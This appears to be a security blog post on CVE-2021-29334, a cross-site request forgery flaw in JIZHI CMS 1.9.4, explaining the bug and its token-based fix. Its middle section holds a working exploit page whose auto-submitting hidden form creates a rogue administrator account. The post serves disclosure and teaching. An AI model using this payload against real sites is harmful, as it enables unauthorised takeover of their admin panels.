JIZHI CMS is a content management system used mainly in Chinese-speaking communities for creating and managing websites easily. In April 2021, a Cross-Site Request Forgery (CSRF) vulnerability was discovered in JIZHI CMS version 1.9.4 (CVE-2021-29334). This bug could let an attacker add a new admin account by tricking a logged-in admin into clicking a malicious link or visiting a specially crafted website. This post takes you through how the vulnerability works, gives you code examples, and shares steps to stay secure.
What is CSRF?
Let’s start simple. CSRF means "Cross-Site Request Forgery." Basically, an attacker tricks your browser into sending a request to a website where you’re already logged in—like your CMS admin page. If that site’s defenses are weak, the attacker’s request acts as if it came from you.
Think of it like someone sneaking a forged check into the stack of checks you’re signing—you may have no idea what just happened, but your signature is on it.
The JIZHI CMS 1.9.4 Bug
This CSRF vulnerability means anyone with access to lure an admin user can make their browser send a request to admin.php/Admin/adminadd.html to create a new admin account.
Why did it happen?
JIZHI CMS 1.9.4 did not have anti-CSRF protections (like CSRF tokens) on the admin add page (/admin.php/Admin/adminadd.html). So, a request from anywhere was accepted without checking if it was a legitimate admin action.
How Can an Attacker Exploit This?
Imagine a logged-in JIZHI CMS admin is browsing the web. The attacker sets up a malicious webpage with hidden code (like a malicious HTML form), and tricks the admin into opening it (e.g., through an email or a forum post).
When the admin loads that page, their browser silently sends a POST request to JIZHI CMS, adding a new admin user—invisible to the victim!
Let's look at a real exploit. The attacker hosts the following HTML code somewhere
<!-- Exploit page: admin_add.html -->
<html>
<body>
<form id="csrf_form" action="http://victim.com/admin.php/Admin/adminadd.html"; method="POST">
<input type="hidden" name="username" value="eviladmin">
<input type="hidden" name="password" value="SuperStrongPass123">
<input type="hidden" name="usergroup" value="1"> <!-- 1 usually means admin -->
</form>
<script>
document.getElementById('csrf_form').submit();
</script>
<!-- When a logged-in admin visits this page, a new admin user is created! -->
</body>
</html>
The form is invisibly submitted when the page loads.
- If the page is requested by someone who is already authenticated on the JIZHI CMS panel, the POST request goes through as if it was an intentional request, adding a new admin named "eviladmin."
How to Prevent It?
CSRF bugs are old, and the fix is old too! To stop CSRF attacks, websites use a “CSRF token”—a random value put in every form and checked on submission. If the value is missing or wrong, the request is denied.
Proof-of-Concept Video (for reference)
- Youtube - CVE-2021-29334 Jizhi CMS CSRF PoC by Yingzhi Mao
Official References
- NVD Entry on CVE-2021-29334
- CVE Details - Jizhi CMS 1.9.4 CSRF vulnerability
Conclusion
CVE-2021-29334 is a textbook case of what happens when a CMS forgets to add anti-CSRF defenses. Always make sure your content management systems are up to date, and use good security practices both as a developer (using CSRF tokens) and as an admin (not clicking suspicious links). If you use JIZHI CMS, update it or patch it today!
Timeline
Published on: 11/23/2022 20:15:00 UTC
Last modified on: 11/28/2022 19:39:00 UTC